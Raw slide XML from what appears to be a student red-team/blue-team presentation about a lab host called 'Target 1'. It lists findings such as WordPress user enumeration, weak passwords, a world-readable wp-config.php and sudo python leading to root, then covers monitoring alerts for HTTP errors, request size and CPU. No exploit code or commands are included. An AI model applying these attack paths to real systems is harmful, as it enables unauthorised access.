            <a:off x="-16400" y="6555533"/>
            <a:ext cx="10629200" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="365725" spcFirstLastPara="1" rIns="0" wrap="square" tIns="60925">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16400" y="1053567"/>
            <a:ext cx="12192000" cy="4829600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-448723" lvl="0" marL="609585" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User set up their own AD </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323" lvl="1" marL="1219170" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DC is at 10.6.12.157</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="433" name="Google Shape;433;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837250" y="1975434"/>
            <a:ext cx="8517501" cy="34299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365779" y="2674684"/>
            <a:ext cx="11460400" cy="10564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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The End</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11477033" y="6609600"/>
            <a:ext cx="349200" cy="140800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900"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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="0"/>
            <a:ext cx="1222155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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11475632" y="6609600"/>
            <a:ext cx="349050" cy="14085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58" name="Google Shape;158;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="4933200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1218975" lIns="609500" spcFirstLastPara="1" rIns="609500" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="159" name="Google Shape;159;p5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="590069" y="1644182"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{98A56654-EA91-4F55-90DB-6ADEFF4DA2A4}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3665950"/>
                <a:gridCol w="3665950"/>
                <a:gridCol w="3665950"/>
              </a:tblGrid>
              <a:tr h="426700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="2200" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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2200" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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2200" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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97275">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Wordpress User Enumeration</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Users are discoverable from wpscan.</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Combined with poor password policy, allows easy access.</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97275">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Weak Password Policy</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Short passwords with only lowercase letters are allowed.</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Passwords so easy that they can be guessed.</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32550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">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      Improper Permissions</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400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Users have access to sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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All users are able to access the wp-config.php file to view the database password.</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1975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">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More Improper Permissions</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400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Steven has access to run python as root.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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2200" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This allows an attacker to easily gain a root shell.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200" u="none" cap="none" strike="noStrike">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>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aef73e88d6_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367272" y="2900771"/>
            <a:ext cx="11457300" cy="10563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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Alerts Implemented</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Google Shape;165;gaef73e88d6_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11475632" y="6609600"/>
            <a:ext cx="349200" cy="141000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121875" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr b="0" i="0" lang="en-US" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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aef73e88d6_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="0"/>
            <a:ext cx="1222170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Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;gaef73e88d6_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11475632" y="6609600"/>
            <a:ext cx="349200" cy="14100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72" name="Google Shape;172;gaef73e88d6_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="493320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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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This watch monitors http response codes above 400</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The alert threshold is 5 or more error response codes within a 5 minute period.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;173;gaef73e88d6_0_5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611150" y="2404275"/>
            <a:ext cx="4955653" cy="391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aef73e88d6_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="0"/>
            <a:ext cx="1222170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HTTP Request Size Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Google Shape;179;gaef73e88d6_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11475632" y="6609600"/>
            <a:ext cx="349200" cy="14100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80" name="Google Shape;180;gaef73e88d6_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="493320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SzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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This watch monitors the size of http request.</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The alert threshold is 3.5kb a minute.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Google Shape;181;gaef73e88d6_0_12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3802400" y="2552425"/>
            <a:ext cx="4587200" cy="3624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aef73e88d6_0_19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="0"/>
            <a:ext cx="12221700" cy="711600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121875" lIns="609500" spcFirstLastPara="1" rIns="365675" wrap="square" tIns="243775">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CPU Usage Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;gaef73e88d6_0_19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11475632" y="6609600"/>
            <a:ext cx="349200" cy="141000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121875"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188" name="Google Shape;188;gaef73e88d6_0_19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353275" y="1147700"/>
            <a:ext cx="11471400" cy="4933200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1218975" lIns="609500" spcFirstLastPara="1" rIns="609500" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</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This watch monitors overall use of system resources by percent.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-114300" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The alert threshold is 50% for in the last 5 minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;gaef73e88d6_0_19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809250" y="2551125"/>
            <a:ext cx="4559448" cy="36247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2020-11-29T06:49:33Z</dcterms:created>
  <dc:creator>Derek Shashek</dc:creator>
</cp:coreProperties>
</file>